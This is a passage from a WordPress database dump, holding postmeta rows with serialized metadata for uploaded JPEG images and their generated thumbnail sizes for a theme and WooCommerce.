;s:5:\"width\";i:1024;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"Debra-Thomas-.-1536x1091.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1091;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:28:\"Debra-Thomas-.-2048x1454.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"Debra-Thomas-.-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Debra-Thomas-.-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Debra-Thomas-.-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Debra-Thomas-.-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:18:\"Debra-Thomas-..jpg\";}'),(13786,4890,'_thumbnail_id','670'),(13787,5308,'_edit_lock','1694513156:1'),(13788,5309,'_wp_attached_file','2020/04/2-2-scaled.jpg'),(13789,5309,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/2-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"2-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"2-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"2-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"2-2-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"2-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"2-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"2-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"2-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"2-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"2-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"2-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"2-2-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"2-2.jpg\";}'),(13790,5310,'_wp_attached_file','2020/04/3-1-scaled.jpg'),(13791,5310,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/3-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"3-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"3-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"3-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"3-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"3-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"3-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"3-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"3-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"3-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"3-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"3-1.jpg\";}'),(13792,5311,'_wp_attached_file','2020/04/4-1-scaled.jpg'),(13793,5311,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/4-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"4-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"4-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"4-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"4-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"4-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"4-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"4-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"4-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"4-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"4-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"4-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"4-1.jpg\";}'),(13794,5312,'_wp_attached_file','2020/04/5-1-scaled.jpg'),(13795,5312,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/5-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"5-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"5-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"5-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"5-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"5-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"5-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"5-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"5-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"5-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"5-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"5-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"5-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"5-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"5-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"5-1.jpg\";}'),(13796,5313,'_wp_attached_file','2020/04/6-1-scaled.jpg'),(13797,5313,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/6-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"6-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"6-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"6-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"6-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"6-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"6-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"6-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"6-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"6-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"6-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"6-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"6-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"6-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"6-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"6-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"6-1.jpg\";}'),(13798,5314,'_wp_attached_file','2020/04/7-1-scaled.jpg'),(13799,5314,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/7-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"7-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"7-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"7-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"7-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"7-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"7-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"7-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"7-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"7-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"7-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"7-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"7-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"7-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;